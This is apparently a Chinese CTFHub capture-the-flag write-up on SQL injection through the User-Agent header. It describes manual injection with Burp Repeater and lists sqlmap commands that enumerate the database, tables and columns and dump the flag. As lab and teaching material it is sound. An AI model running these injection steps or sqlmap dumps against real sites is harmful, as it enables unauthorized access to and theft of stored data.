UA注入
方法一:手注
- 使用BurpSuite进行截断,并使用Repeater改包

如图所示,对User-Agent处进行修改,点击Go之后页面出现变化
-
输入1+1 ,页面返回 id=2 说明存在字符型注入漏洞
-
使用 1 order by … 测试得字段数为2
-
如图,开始注入,爆出库名

-
爆出表名

- 爆出列名

- 爆出数据,拿到flag

ctfhub{5ba8fd44460a9858b2ba1510}
方法二:sqlmap
使用指令
python sqlmap.py -u "..." --level=3 -dbs
爆出库名
python sqlmap.py -u "..." --level=3 -D sqli -tables
python sqlmap.py -u "..." --level=3 -D sqli -T ocgghueezd -columns
python sqlmap.py -u "..." --level=3 -D sqli -T ocgghueezd -C yubmizjeqy -dump
拿到flag
本文介绍了一种通过修改User-Agent头实现的SQL注入攻击方法。详细展示了两种利用方式:手动注入和使用sqlmap工具自动化注入的过程。从发现漏洞到获取敏感信息,包括库名、表名、列名直至最终获得flag。

2490

被折叠的 条评论
为什么被折叠?



